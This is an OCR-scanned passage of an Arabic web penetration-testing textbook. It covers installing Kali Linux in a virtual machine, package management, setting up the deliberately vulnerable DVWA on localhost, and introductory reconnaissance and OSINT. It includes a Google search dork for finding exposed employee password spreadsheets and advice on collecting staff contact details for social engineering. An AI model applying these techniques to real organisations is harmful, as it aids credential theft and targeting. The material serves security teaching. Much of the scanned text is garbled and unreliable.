هناك عدة طرق لإعداد بيئة الاختبار ولكن خلال هذا الكتاب سوف 

استخدم machines )(VM(‏ اvirtua‏ والتني هي عبارة عن سوفت وير 

تسمح باستضافة وعمل نظام تشغيل آخر على نفس الجهاز. 
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۷ تتطلب مصادر مثل الذاكرة المستخدمة ويمكن أن تقوم بتشغيل 

أكثر من ۷۷s‏ في نفس الوقت وهذا يسمح بخلق شبكة تخيلية تعمل 
على نفس الجهاز المضيف. 

لديك عدة خيارات لتحديد نوع السوفت وير الذي ترغب في استخدامه 

Oracl VM VirtualBox jرتil‎ liÎ 

في هذا الکتاب سوف نعمل على ٥ہiاacہ‏ اvirtua‏ تستخدم كلا من 


.virtual machine Jlc Kali Linux plضزنi‎ مدخüwسi سوف‎ 


البداية مع كالي لينكس: 


كالي iاة»‏ هو عبارة عن توزيعه من نظام التشغيل لينكس مخصصة 
لاختبار الاختراق والتدقيق في السلامة المعلوماتية وهو الوريث لنظام 
lıك BackTrack dli‏ 


قبل البدء باختبار اختراق مواقع الويب سوف نتعرف على الأمور التالية: 


٠‏ نظرة عامة على كالى لينكس. 
" إعداد خدمات الشبكة وإعداد اتصال محمي وآمن. 
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١‏ تحديث الكالي لينكس. 
" زيادة إمكانية كالي من خلال تنزيل تطبيقات أخرى. 
١‏ الإدارة الفعالة لاختبار الاختراق. 


کالی لینکس ×ںہ نا اa»:‏ 


الباك تراك Back rack )8B)(:‏ هو نظام تشغيل مبني على لینکس 
وهو مخصص لاختبار الاختراق و يحوي على الأدوات الخاصة باختبار 
الاختراق والتدقيق المعلوماتي وهذه الأدوات يمكن أن تستخدم من 
قبل مدير الشبكة لاختبار الحماية الخاصة بالشبكة ويمكن أن تستخدم 
من قبل الهاكرز للقيام بأعمال غير مشروعة. 

آخر اصدار من الباك تراك هو 8۲5۲3 وتم إصداره في شهر أب عام 2012 
وهو مبني بالاعتماد علی توزیعه ابونتو ×ںہ اا uہuطل‏ ولسوء الحظ 
كان من الصعوبة إدارة الأدوات بداخله حيث كانت كل الأدوات 


المستخدمة في اختبار الاختراق موجودة في المجاد pentest/‏ 
إيجاد وتشغيل الأدوات في هذه الهيكلة كان أمر صعب. 


في شهر اذار عام 2013 تم الإعلان عن كالي لینکس کبدیل أو کوریث 
للباك تراك 


الكالي لينكس مبني على qjgîعa‏ دڍڊjlı Debian GNU/Linux‏ 
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في توزيعه ديبيان تم الالتزام بمعيار ترتيب ملفات النظام 


Filesystem Hierarchy Stoddard (FHS)‏ والذي يميز الكالي عن الباك 
تراك وأصبح بالإمكان استدعاء أي أداة من أي مكان دون الحاجة إلى 
التنقل عبر ٥eء)‏ اentesم‏ كما في الباك تراك. 

كالي 2 هو آخر إصدار من توزيعة اختبار الاختراق المشهورة 


Backtrack/Kali Linux 


وهو يحوي على أفضل الأدوات المستخدمة في عملية اختبار الاختراق أو الهكر 
الأخلاقي. 


میزات نظام کالی: 


يدعم عدة بيئات من سطح المكتب 
Gnome, KDE, LXDE and XFCF‏ 


" متزامن ومتوافق مع مستودع أداوت ديبيان وهذا يسهل عملية 
تحديث الحزم وتطبيق التحديثات الأمنية. 

* يدعم تعديل ۱50 ويسمح للمستخدم ببناء نظام كالي خاص به. 

١‏ يحوي على أكثر من 300 أداة مخصصة لاختبار الاختراق والتدقيق 
المعلوماتي. 
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" يدعم عدد كبير من كروت الشبكة اللاسلكية ويدعم حقن حزم 
البيانات بشكل لاسلكى. 

٠‏ كالي هو مشروع مفتوح المصدر وهو مجاني وهو مدعوم من 
مجتمع كبير جداً. 

من أجل إعداد بيئة اختبار اختراق آمنة نحن بحاجة أولاً إلى تحميل ناج 

۷۸ وتنصیبه علی‎ Linu× 


الخطوات التالية هي تجهيز ۷% iاج»:‏ 


.١‏ حمل صورة ۱08 كالي الموافقة لمواصفات جهازك 


Kali Linux Downloads 


Download Kali Linux Images 


We generate fresh Kali Linux image files every few months, which we make available for download. This page provides the 


links to download Kali Linux in it’s latest release. For a release history, check our Kali Linux Releases page. 


Image Name Direct Torrent Size Version SHA1Sum 

Kali Linux 64 bit ISO Torrent 3.16 2.0 aaeb89a78f155377282f81a785aa1b38ee5f8ba0 
Kali Linux 32 bit ISO Torrent 3.26 2.0 6e5e6390b9d2f6a54bc980f50d6312d9c77bf30b 
Kali Linux 64 bit Light ISO Torrent 0.86 2.0 fc54f0b4b48ded247e5549d9dd9ee5f1465f24ab 
Kali Linux 32 bit Light ISO Torrent 0.96 2.0 bd9f8ee52e4d31fc2de0a77ddc239ea2ac813572 
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. قم بخلق ۷0 جديدة وقم بإعداد مساحة القرص المطلوبة 
Jlgذاكرö RAM‏ 


Memory Size 


Select the amount of memory (RAM) n magabytes to be adocatod to the 
wtual machine, 


The recommended mermrory sina s5 384 MS. 


o © -0-0 ¢ n Oe Or © © © -0. O8 POP E" 7P1O 


4 HB 8192 M8 


Ca) Cema 


اختبار اختراق سيرفرات وتطبيقات الويب 


File location and size 


Pleaşe type the name of the new virtual hard drive file into the box below or 
dick on the folder icon to select a different folder to create the file in. 


[Kaun 0 


Select the size of the virtual hard drive in megabytes. This size is the limit on 
the amount of fle data that a virtual machine will be able to store on the hard 
drive. 


ae TTT: 


2.00 TB 


xa (atmo) Î Dépty 
% harrg lec Marner” I28 
RamGoa Oagitop Safer: DOsadd 
[7] Mobile 
2 Storage 
Corengier; DE 


DE Sêcûsdary Mabe: [CD/DVD] Empty 
Cortoaler: SATA 

SATA Pût û: Kal Lust vû ortak, 12,00 60) 
# nêo 


Hast Drver Wrdears DrecrSoynd 
Contos: KU AD? 


7° hetwmeork 

Adapter 14 Haul PRO/1006 MT Daukroo (HAT) 
ر‎ u 

Dewoe Fhe: Û [0 xve) 

li) Soret follies 

ions 

yg Dmrnption 


nme 


ثم قم باختيار ۱0S‏ اه وابد عملية التنصيب 
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Jj Remove Esk from virtual drive 


ټ ۾ a‏ @ 


e tig gri‏ و یی کس ا ستو سا 
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KAL 


tHe Quieter YOu | Decomle (tHe Ore yOu are able to hear”? 


Boot menu 


fai l 
mode) 
(check kali. org 
(check kal i .orqg 


ynthes i 


system. 
Language: 


Bosnian 

Bulgarian 

Burmese 

Catalan 

Chinese (Simplified) 
Chinese (Traditional) 
Croatian 

Czech 

Danish 

Dutch 

Dzongkha 

ingi ooo 
Esperanto 

Estonian 

Finnish 

French 

Galidan 

Georgian 

German 

Greek 

Gujarati 

Hebrew 

Hindi 
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Partition disks 


If you continue, the changes listed below will be written to the disks. Otherwise, you will be able to make further changes manually. 


The partition tables of the following devices are changed: 
sSCSI1 (0,0,0) (sda) 


The following partitions are going to be formatted: 
partition #1 of SCSI1 (0,0,0) (sda) as ext4 
partition #5 of SCSI1 (0,0,0) (sda) as swap 


write the changes to disks? 
© No 


O Yes 


Install the system 


IIIIN) toting thc sytem. 


Copying data to disk... 


وبعد انتهاء عملية التنصيب قم بتسجيل الدخول باسم المستخدم أoo٣‏ 


وكلمة السر التي قمت باختيارها أثتاء عملية التنصيب. 


اختبار اختراق سيرفرات وتطبيقات الويب 


Applications ¥ 


Untitled Folder 


أدوات کالی: 
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:Information Gathering تloglعeall جمع‎ " 


تحوي على أدوات الاستطلاع المستخدمة لجمع المعلومات والبيانات من 
الشبكة أو الجهاز الهدف. 


:Vulnerability Analysis تIرغûilاl‎ Jليلحت‎ ١ 


تحوي على أدوات تخمين الثغرات في النظام الهدف وهذه الأدوات 
تستخدم بعد القيام بعملية الاستطلاع وجمع المعلومات عن الشبكة أو 
الجهاز الهدف. 


:Web Applications Analysis بıglJ| تحليل تطبيقات‎ * 


تحوي على الأدوات التي تستخدم في فحص واستغفلال التغرات في 
سيرفرات الويب ومعظم هذه الأدوات سوف يتم شرحها خلال هذا 
الكتاب. 


:Password Attacks wll ةnلlک الهجمات على‎ " 


تحوي على الأدوات التي تقوم بهجمات القوة الغاشمة brute force‏ 


وهجمات تخمين كلمت السر بشکل ٥ہ:ا؟of‏ 
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:Wireless Attacks ةيكluاlJl|l الهجمات على الشبکكات‎ ٠ 


تحوى على الأدوات المستخدمة في استغلال الثغرات الموجودة في 
برتوكول الشبكات اللاسلكية 802.11 بالإضافة لأدوات استغلال ثغرات 


البلوتوث و ثغرات R۴۱0‏ 


:Exploitation Tools JاléiwlJl‎ تIgد‎ « 


تحوي على الأدوات المستخدمة فى استفلال الثفرات التي تم 
اكتشافها فى النظام الهدف. 


:Sniffing and Spoofing ةيصnخشÃiلاl التنصت وانتحال‎ ٠ 


تحوي على أدوات إلتقاط حزم البيانات في الشبكة و أداوت تعديل حزم 
البيانات من أجل انتحال الشخصية. 


» i®llدسة‏ lاعكıية Reverse Engineering‏ : 
تحوي على أداوت الهندسة العكسية وأدوات تحليل البرمجيات الخبيثة. 
٠‏ التحليل الجنائي ءعsiم ۴e‏ ه۴: 


تحوي على الأدوات المستخدمة في مراقبة وتحليل بيانات وتطبيقات 
الشبكات. 
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:Reporting Tools jıرlتتll أدوات اعداد‎ * 


تحوي على الأدوات المستخدمة في إعداد تقرير عن المعلومات التي تم 
الحصول عليها خلال عملية اختبار الاختراق. 


:System Services plزill خدمات‎ " 


يمكن من خلالها تفعيل وإلغاء تفعيل خدمات كالي مثل سيرفر 


الاباتشي و سيرفر قواعد البيانات. 


يجب تحديث الكالي بشكل دائم للتأكد من أن نظام التشغيل الأساسي 
والتطبيقات هما في أحدث نسخة وأن التحديثات الأمنية مطبقة. 


ويتم ذلك باستخدام التعليهة 


apt-get update 


¥ apt -gqet Up 2 
'/http.kali.org sana InRelease [20:3 KB] 
ecurity.kali.org sana/updates InRelease [11.9 KB] 
://http.Kali.org sana/main Sources [9,090 KB] 
://hnttp.kali.org sana/contrib Translation -en_US 


http.kali.org sana/contrib Translation-=en 

security.kali.org sana/updates/contrib Translation-en_ US 

http.kali.org sana/main Translation -en_US 

security.kali.org sana/updates/contrib Translation -en 
/fhttp.kali.orqg sana/main Translation -en 
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نظام إدارة حزم ديبيان: 
يعتمد هذا النظام على حزم تطبيقات منفصلة تسمى كعوac)kaم‏ 


هذه الحزم يمكن أن يتم تنصيبها أو إزالتها من قبل المستخدم ومنها 
ما يدعم عملية اختبار الاختراق ومنها ما يزيد من قدرات نظام الكالي 
كدعم المهام مثل الاتصالات مثل 

(Skype, instant messaging and secure e-mail) 


أو دعم المستندات النصية مثل (OpenOffice(‏ 


الحزم يتم تخزينها في مستودعات ويتم تحميلها من قبل المستخدم 


نظام إدارة حزم ديبيان و)مك: 
dpkg - Debian Package Management System‏ 
الأمر وامك يستخدم لتنصيب أو إزالة أو طلب حزم 


الأمر التالي يستخدم لطباعة كل الأدوات الموجودة في النظام داخل 
dpkg -I > list.txt‏ 


والأمر التالي يستخدم لمعرفة إذا كانت أداة معينة قد تم تنصيبها: 
dpkg -I / grep <tool name>‏ 


اختبار اختراق سيرفرات وتطبيقات الويب 


e 1|‏ کإ التالي hı‏ نتید نفا . الأمر 
dpkg -|‏ 


وهو يعرض قائمة بالتطبيقات التي تم تنصيبها على كالي 


:~# dpkg - 
Jesired=Unknown/ Instal l1 /Remove/Purge/Holad 
Status=Not/Ins onf -files/Unpacked/halF -conf/Hal f -inst/trig-aWait/T rig -pend 
/ Err?=(none) /Reinst -required (Status,Err: uppercase=bad) 
Version Architecture Description 


A traceroute tool that can run wi 
Password dictionary attack tool f 
query and manipulate user account 
A simple VoIP corporate directory 


Access control List utilities 

add and remove users and groups 
default icon theme of GNOME 
Advanced Forensics Format Library 
Adobe Glyph List For New Fonts 
wireless WEP/WPA cracking utiliti 
Console based ALSA utilities for 
next -generation scanning tool for 
Processor microcode firmware for 


).2.1-1kali4 
.6.37 -3+b1 
1.10-1kali5 
.2.52-2 
3.113+nmu3 
adwaita-icon-t 3. ] 


Qt race 
acccheck 
accountsservic 
ace-voip 

acl 

adduser 


afflib-tools 
aglfn 
aircrack -ng 
alsa-tools 
amap 
amd64 -mic rocod 
anac ron 


cron-like program that doesn't go 
Enumerate usernames on systems Wİ 


apache -users .1-1kali2 amd64 


استخدام امھ: 
Advanced Packaging Tools (APT) J رlanüil aa Apt‏ 
وهي توسيع لوظيفة و)مك فهي تقوم بالبحث في المستودع وتنصب 


الحزمة المطلوبة أو تقوم بتحديثها 
ويمكن أن تستخدم امه للقيام بعملية ترقية مل١ه٣ومں‏ لكامل التوزيعه 
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التالي هو بعض استخدامات تعليمة أمه: 
update »‏ etو-امه:‏ تستخدم من أجل إعادة تزامن ملفات الحزمة 
الحالية مع مصدرها الفأعرف في ملف اءاا.sئمc su‏ وهذه 
التعليمة (عملية التحديث) يجب أن تستخدم دائماً قبل القيام 


upgrade or dist-upgrade بعملیة الترتية‎ 


upgrade "‏ etو-امه:‏ تستخدم لتنصيب أحدث نسخة من كل الحزم 
المنصبة على النظام وذلك من خلال المصادر الفعرفة في ملف 
sources.list‏ 


عملية الترقية لا تقوم بتغير أو حذف الحزم التي لا يوجد نسة 
جديدة منها ولا تقوم بتنصيب أي حزم جديدة غير موجودة مسبقاً. 


show >pمackage‎ name> "‏ cache-tمap:‏ تستخدم لعرض معلومات 


عن حزمة معينة. 


remove >package name> "‏ get-امه:‏ تستخدم لحذف حزمة 


2 di 


dist-upgrade‏ etو-tامه:‏ تستخدم لترقية كل الحزم المنصبة على 
النظام وتقوم بإزالة الحزم المهجورة من على النظام. 
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يمكن أن تستخدم أكثر من تعليمة بنفس الأمر كما في المثال التالي: 
apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y‏ 


هذا الأمر سوف يقوم بتحديث الحزم ثم ترقيتها ثم حذف الحزم 
المهجورة. 


إعداد وتعديل كالي لینکس: 
بعض التعديلات تتضمن الأمور التالية: 
" إعادة ضبط کlلnئة‏ lلںjJu root password‏ 
* ]ضilفة‏ مiiüwدمp non-root user‏ 


١‏ تسريع عمليات كالي. 


إعادة ضبط كلمة سر: 
لتغير كلمة السر الافتراضية للمستخدم الأساسي ك٣مسءعهم‏ اه٣‏ يتم 
من خلال التعليمة التالية: 


passwd root 


سيطلب منك إدخال كلمة السر الجديدة كما في الشكل التالي: 


:~# passwd root 
Enter new UNIX password: 


Retype new UNIX password: 
passwd: password updated successfully 
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:non-root user مpدiiüم‎ ةفlضإز‎ 


العديد من التطبيقات في نظام كالي تحتاج لصلاحيات الروت لتعمل, 
العمل بصلاحيات الروت هو أمر خطير لأن أي استخدام خطأ لأي تعليمة 


يمكن أن يضر بالأداة أو حتى بالنظام وفي بعض الحالات يفضل 
المستخدم العمل بصلاحيات مستخدم عاديa non-root user‏ 
يمكن خلق مستخدم جديد لا يملك صلاحيات الروت من خلال الأمر التالي: 


adduser nameuser 


:¬~# adduser noroot 

Adding user *noroot ' 

Adding new group *noroot" (1003] 

Adding new user *noröoot' (1002) with group *noroot ' 

Creating home directory ` /home/noroot ' 

Copying files from ` /etc/skel ' 

Enter new UNIX password: 

Retype new UNIX password: 

passwd: password updated successfully 

Changing the user information for noroot 

Enter the new value, or press ENTER for the default 
Full Name [] : 
Room Number [ 
Work Phone [] 
Home Phone [ ] 
Other []: 

Is the information correct? [Y/n] 


1 


تسریع عملیات کالی: 


بعض الأمور التي تساعد على تسريع العمليات في نظام کالي: 
٭ عندما تستخدم machine‏ اvirtua‏ قم بتنصیب 


VM's software driver package 
Guest Additions (VirtualBox) or VMware Tools (VMware) 
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عندما تقوم بخلق ٥٣ھ"‏ اھںvirt‏ قم باختیار حجم قرص ثابت لأن 
عملية إضافة الملفات إلى القرص ذو الحجم الثابت تكون أسرع. 
" قم بتنصيب ا¡۸8ه٠ها8‏ من خلال الأمر التالي: 


Building dependency tree 
Reading state information... Done 


هذا التطبيق يقوم بتحرير مساحة القرص ويحذف الملفات المؤقتة من 
الذاكرة ويحذف الكوكيز وتاريخ تصفح الانترنت وينظف السجلات ويزيل 
الملفات الغير ضرورية وهذا يساعد على تسريع النظام. 


تنصيب أدوات إضافية على كالى لينكس: 
رغم أن كالي يحوي على العديد من الأدوات ولكنه من المحتمل أن تحتاج 
لتنصيب أدوات إضافية لزيادة فعالية عملية اختبار الاختراق في بيئات 
يوجد عدة طرق لتنصيب أدوات إضافية على كالي: 

apt-get ةoيlei استخدام‎ 

GitHub repository Jl| Jgصgll‎ " 

١ه‏ التنصيب المباشر للأدوات 
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كل الأدوات الموجودة في مستودع کlنلي py Kali Linux repository‏ 
تنصيبها من خلال التعليمة: 


apt-get install 


بعض التطبيقات الموصى بها: 

" eاfi-tمap:‏ وهي اoەt command-line‏ تستخدم للبحث داخل نظام 
APT packaging system‏ وهي تسمح لك بعرض محتويات الحزمة 
بدون تنصيبها أو جلبها. 

" اto0-tweak-eصnomو:‏ تسمح للمستخدم بتغییر ۳٣6s‏ ۴٥ط‏ وتغییر 
إعدادات سطح المكتب. 

" en0fficeم0p:‏ وهو مجموعة تطبيقات مفتوحة المصدر تستخدم 
لإنشاء وإدارة المستندات النصية. 

* ubاعء:‏ وهو أداة حماية تقوم بحذف البيانات بشكل أمن عن طريق 
استخدام عدة أشكال لإاعادة الكتابة فوق البيانات. 
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تطبيق الويب الهدف: 

Damn Vulnerable Web Application (DVWA)‏ سوف یستخدم 

كتطبيق ويب هدف ويمكن أن تقوم بالبحث عنه من صفحته على 
|Jlاiترiنٽ http://www.dvwa.co.uk‏ 

۷۷A‏ هو تطبیق ویب )۴۳۸۶/۷۷8۵ ومصمم بشکل يحوي علی تغرات 
ليساعد محترفي الحماية لاختبار مهارتهم وأدواتهم في بيئة شرعية 
وآەنة وهو يساعد مطوري الويب على فهم عمليات الحماية في 
تطبيقات الويب. 

ولكن 0۷۷۸ بشكل طبيعي غير متوفر على ۷0 لذلك عليك أن تقوم 
بخلق ۷N‏ الخاصة بك ثم تقوم بإعداد 0۷۷۷۸ ليعمل داخلها, عملية 
التركيب والتنزيل مشروحة على موقع 0۷۷۸4 على الانترنت. 

لأغراض في هذا الكتاب سوف نستخدم 0۷۸۷۸ من خلال تشغيله على 
gÎ http://localhost ãhwlgı Kali VM‏ 127.0.0.1 

سوف نقوم باستضافة كلا من 0۷۷۸ ونظام کالي على نفس ۷×۸ أي 


أنك سوف تملك كل شيء تحتاجه على ۷0 واحدة وبالتالي ستقلل من 
استخدام مصادر النظام. 
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تنزيل تطبيق الويب الهدف: 


الخطوات التالية هي لتنصيب 0۷۷4 كتطبيق ويب هدف وهذا يتطلب 
اتصال بالإنترنت لذلك تأكد من أن كالي يمكنه الاتصال بالانترنت 


لتنصيب 0۷۷۸4 اتبع الخطوات التالية: 


١‏ قم بتحميل 0۷۷۸ من موقعه الرسمي على الانترنت 
٠١‏ قم بفك ضغط الملف المحمل 


mm 
a A 


DVWA-1.9 DVWA-1.9.zip 


" قم بتغير اسم المجلد من ما0۷W۸-1.0.9.zi‏ إلى مسل وقم بنقله 
إلى المسار 
var/www/ihtml‏ 


| var www html 


E —- 
we = 


205 html 


* قم بإعطاء المجلد صلاحية من خلال التعليمة التالية 


:~# chmod -R 755 /var/www/html /dvwa/ 
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١‏ شغل 2ء۸اعدمA‏ باستخدام التعليمة التالية 


:~# service apache2 start 


MySQL Jغش‎ "° 


:~# service mysql start 


١‏ قم بخلق قاعدة بيانات ل مس۷ باستخدام التعليمة التالية 
mysql -u root -p‏ 


اضغط عام وعندما يسألك عن كلمة السر اتركھا خالية و اضغط enter‏ 


:~# mMYyYSQ 
Enter password: 
Welcome to the MySQL monitor. Commands end with ; 
our MySQL connection id is 43 
Server version: 5.5.46-Q0+deb8u1 (Debian) 


Copyright (c) 2000, 2015, Oracle and/or its affiliates. ALL rights reserved. 
Oracle is a registered trademark of Oracle Corporation and/or its 


affiliates. Other names may be trademarks of their respective 


'\h' for help. Type '\c' to clear the current input statement . 


ثم اكتب التعليمة التالية: 


create database dvwa:; 


enter h2/ضlg‎ exit بتûكl‎ 
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١‏ افتح المتصفح واكتب العنوان التالي: 
127.0.0.1/dvwa‏ 
١‏ قم بتسجيل الدخول باستخدام اسم المستخدم الافتراضي admin‏ 
وكلمة السر الافتراضيöã password‏ 


127.0.0.1/dvwa/index.php vC ET + ھ‎ 


Most Visited v Offensive Security Kali Linux Kali Docs Kali Tools ® Exploit-DB Pm Aircrack-ng 


DUA) 


I Welcome to Damn Vulnerable Web Application! 


Instructions Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main 
goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web 
Setup / Reset DB developers better understand the processes of securing web applications and to aid both students & teachers to 


learn about web application security in a controlled class room environment 


Brute Force The aim of DVWA is to practice some of the most common web vulnerability, with various difficultly 
sees levels, with a simple straightforward interface 

Command Injection 

CSRF 


E1 2 General Instructions 
ile Inclusion 


File Upload It is up to the user how they approach DVWA. Either by working through every module at a fixed level, or 
selecting any module and working up to reach the highest level they can before moving onto the next one. There 
Insecure CAPTCHA is not a fixed object to complete a module; however users should feel that they have successfully exploited the 


system as best as they possible could by using that particular vulnerabilit 
SQL Injection 1 3 


SQL Injection (Blind) 


XSS (Reflected) DVWA also includes a Web Application Firewall WAF), PHPIDS, which can be enabled at any stage to further 
XSS (Stored) increase the difficulty. This will demonstrate how adding another layer of security may block certain malicious 
actions. Note, there are also various public methods at bypassing these protections (so this can be see an as 
extension for more advance users)! 


Please nate, there are both documented and undocumented vulnerability with this software. This is 
intentional. You are encouraged to try and discover as many issues as possible 


DVWA Security : : 
here is a help button at the bottom of each page, which allows you to view hints & tips for that vulnerability. 
PHP Info here are also additional links for further background reading, which relates to that security issue 
About 
WARNING! 
Logout 


Create/setup Database Jlc he2iضllڊ‎ pa setup ةnoÛilã من‎ 


لتقوم بخلق أول قاعدة بيانات لاستخدامها في الاختبار الأول. 
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Database Setup 


Click on the ‘Create / Reset Database' button below to create or reset your database. 
If you get an error make sure you have the correct user credentials in: /var/www/html/dvwa/config 
/config.inc.php 


Setup / Reset DB 


Ifthe database already exists, it will be cleared and the data will be reset. 
You can also use this to reset the administrator credentials ("admin // password") at any stage. 


Setup Check 


Operating system: *nix 
Backend database: MySQL 
PHP version: 5.6.14-0+deb8u1 


Web Server SERVER_NAME: 127.0.0.1 


PHP function display_errors: Disabled 
PHP function safe_mode: Disabled 

PHP function allow_url_include: Disabled 
PHP function allow_url_fopen: Enabled 
PHP function magic_quotes_gpc: Disabled 
PHP module php-gd: Missing 


reCAPTCHA key: Missing 


Writable folder /varfwww/html/dvwa/hackable/uploads/: No 
Writable file /varfwww/html/dvwa/external/phpids/0.6/libIDS/tmp/phpids_log.txt: No 


Status in red, indicate there will be an issue when trying to complete some modules. 


Create / Reset Database 


Create / Reset Database 


Database has been created. 
Users table was created. 
Data inserted into 'users' table. 
‘guestbook’ table was created. 


Data inserted into ‘guestbook! table. 


Setup successful! 
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من القائمة WA Security‏ اختر Wها‏ كما في الشکل التالي 


ثم اضغط علی زر sub‏ 


Home DVWA Security ن‎ 


Instructions 
Setup / Reset DB Security Level 
Security level is currently: low. 
Brute Force : : ٠ 
You can set the security level to low, medium, high or impossible. The security level changes the vulnerability 
Command Injection level of DVWA: 
CSRF 1. Low - This security level is completely vulnerable and has no security measures at all. lt's use is to be 


as an example of how web application vulnerabilities manifest through bad coding practices and to serve 
as a platform to teach or learn basic exploitation techniques. 

. Medium - This setting is mainly to give an example to the user of bad security practices, where the 
developer has tried but failed to secure an application. lt also acts as a challenge to users to refine their 


File Inclusion 
File Upload 


NJ 


Insecure CAPTCHA exploitation techniques 

TEES 3. High - This option is an extension to the medium difficulty, with a mixture of harder or alternative bad 
SQL Injection practices to attempt to secure the code. The vulnerability may not allow the same extent of the 

EET : exploitation, similar in various Capture The Flags (CTFs) competitions. 
SQL Injection Bine) 4. Impossible - This level should be secure against all vulnerabilities. lt is used to compare the vulnerable 
XSS (Reflected) source code to the secure source code. 


Priority to DVWA v1.9, this level was known as 'high' 


XSS (Stored) 


DVWA Security 


| Low | |_ Submit | 


الآن أنت جاهز لاستخدام أدوات اختبار الاختراق في كالي لينكس 
لمهاجمة تطبیق الویب 05۷۷۸ 


لا يجب عليك أن تقوم بإغلاق ۷۷ في كل مرة تريد بها التوقف عن 
العمل بل يمكنك القيام بعملية ايقاف ۷N‏ ل١ءمءنء‏ وبالتالي سيتم 
الحفاظ على الحالة التي كنت تعمل عليها إما إذا قمت بعملية إغلاق 
shut down ۷M‏ فيجب عليك اتباع الخطوات السابقة لتقوم بإعداد بيئة 


العمل مرة أخرى. 
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css ssés 
محتوى هذا الفصل:‎ 
المبادئ الأساسية للاستطلاع.‎ ٠ 
جمع معلومات المستخدم.‎ " 
التعرف على سيرفر الويب.‎ ٠ 
استراتجيات البحث السري.‎ " 


/'m a hacker, but I'm the good kind of hackers. And 
/'ve never been a criminal 
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مقدمة: 
الاستطلاع هو أول مهمة يجب القيام بها في عملية اختبار الاختراق ضد 
أي شبكة أو أي سيرفر, مختبر الاختراق يمضي أكثر من %75 من وقت 
عملية اختبار الاختراق في استطلاع واكتشاف الهدف ومعرفة الخدمات 
التي تعمل على النظام الهدف والبحث عن التغرات التي تؤدي بالنهاية 
لعملية الاستغلال. 
يوجد نوعان من عملية الاستطلاع: 

Passive reconnaissance Jlعûف‎ jıغل| الاستطلاع‎ " 

" Ûüwlllطllع‏ eillعJl active reconnaissance‏ 
بشكل عام فإن الاستطلاع الغير فعال يتم من خلال تحليل البيانات 
المتوفرة بشكل مفتوح في صفحات الموقع الهدف أو في صفحات 
الانترنت الأخرى, عند الوصول لهذه المعلومات فإن مختبر الاختراق لا 
يتفاعل مع الهدف ولن يكون هناك أفعال تسجل في سجلات الحماية 
الخاصة بالهدف., الاستطلاع الغير فعال مهم جداً لمختبر الاختراق لكي 
يتعرف على الهدف. 
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في هذا الفصل سوف نتعرف على مبادئ الاستطلاع والتي تتضمن 
الأمور التالية: 

١‏ المبادئ الأساسية للاستطلاع. 

٭» مصادر الاستخبارات nllمخiتagدi Open-source intelligence‏ 


(OSINT) 
ورسم خریطة للمسار‎ DNS )Domain name service) استطلاع‎ 


|Pv4 and ۱۴۷6 والتعرف على نظامي العنونتة‎ rدute‎ mapping 
الحصول على معلومات المستخدم.‎ ١ 
التعرف على صفحات المستخدمين من أجل تشكيل قائمة بكلمات‎ ١ 
السر المحتماة.‎ 


المبادئ الأساسية للاستطلاع: 

الاستطلاع هو او عملية يجب أن يقوم بها المهاجم قبل البدء بعملية 
الهجوم الفعلي على الهدف وتقسم عملية الاستطلاع إلى استطلاع 
غير فعال (لا يوجد تفاعل مباشر مع الهدف) واستطلاع فعال (تفاعل 
مباشر مع الهدف) 

خلال عملية الاستطلاع الغير فعال لا يتم تسجيل أي أفعال قام بها 
المهاجم في سجلات الحماية الخاصة بالهدف (مثل البحث عن عنوان 


ايميل الهدف عبر محرك البحث غوغل) 
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بشكل عام فإن الاستطلاع الغير فعال يركز على الشركة الهدف وعلى 
الموظفين وجمع المعلومات المتوفرة بالإنترنت عن الهدف كأن يقوم 
مختبر الاختراق بتصفح موقع الشركة الهدف عبر الانترنت ويشاهد 
الصفحات المختلفة ويقوم بتحميل المستندات الموجودة لكي يقوم 
بدراستها وتحليلها. 

أما في عملية الاستطلاع الفعال فإن مختبر الاختراق يقوم بعملية مسح 
أو فحص للبورتات في الشبكة الهدف وهذا يمكن أن يثير أو ينبه جهاز 
الإنذار في نظام الحماية في الشبكة الهدف ويمكن أن يتم إلتقاط 
عنوان ۱۴ الخاص بمختبر الاختراق والذي يمكن أن يستخدم للكشف عن 
هویته. 

لتصبح مختبر اختراق محترف يجب عليك أن تقوم بجمع أكبر قدر من 
المعلومات المفيدة من خلال عملية الاستطلاع الغير فعال لأنه عبر 
الاستطلاع الغير فعال تقلل من مخاطر اكتشافك من قبل نظام الحماية 


في الهدف. 


مصادر الاستخبارات المفتوحة: 


أول خطوة يقوم بها المهاجم هي جمع المعلومات من 
Open-source intelligence or OSINT‏ 


وهو عبارة عن تجميع المعلومات من المصادر العامة المفتوحة وبشكل 
خاص من الانترنت. 
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عملية جمع المعلومات من المصادر المفتوحة وتحليلها هو أمر ضخم 
ومعقد ولا يمكن شمله كاملا في هذا الكتاب لذلك سوف اتحدث فقط 


عن بعض الأمور الأساسية: 


٠‏ الموقع الجفرافي لمكتب الشركة الهدف. 

٠‏ نظرة عامة على الشركة الأساسية وعلى الشركات الفرعية التابعة 
لها. 

٠‏ معرفة أسماء الموظفين و عناوين الإيملات الخاصة بهم وأرقام 
هواتفهم. 

٠‏ معرفة الثقافة واللفة الخاصة بالشركة لأن هذا يساعد في هجوم 
الهندسة الاجتماعية. 

٠‏ معرفة الشركاء ومندوبي المبيعات الذين تتعامل معهم الشركة 
الهدف. 


مصادر أخرى متوفرة ومجانية يمكن أن تستخدم لجمع المعلومات: 


« محركات البحث Google and Bing Jie‏ 
مختبر الاختراق يمكن أن يدخل مصطلحات بحث خاصة للحصول على 
المعلومات التي يرغب بها 
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company name" + password filetype:xls" 


استخدام العبارة السابقة كدخل لمحرك البحث يمكن أن يعرض جداول 

أكسل تحوي على كلمات السر الخاصة بالموظفين. 

مصطلحات البحث تسمى أيضاً دورك ksاەل‏ ماوGoo‏ 
www.exploit-db.com/google-dorks‏ 

الكالي يحوي على أداة استطلاع وبحث عن معلومات تعمل بشكل 

أوتوماتيكي وهو وا۷3 سنتحدث عنها لاحقاً في هذا الكتاب 

واحد من أكکثر محركات البحث lelية Yandex www.yandex.com g®‏ 

وهو محرك بحث روسي ويسمح بعملية بحث بلغات أخرى منها الإنكليزية 

وهو فعال أكثر من غوغل في حالات البحث عن معلومات مخصصة. 


المواقع الحكومية والمواقع المالية ومواقع المنظمات. 

٠‏ مواقع التوظيف للبحث عن معلومات عن الشركة الهدف. 

المحتوى المخبئ يمكن عرضه من خلال أمر البحث التالي ااu:٣ca‏ 
في محرك البحث غوغل. 


" المواقع التي تقوم بجمع ومقارنة النتائج من عدة محركات بحث 


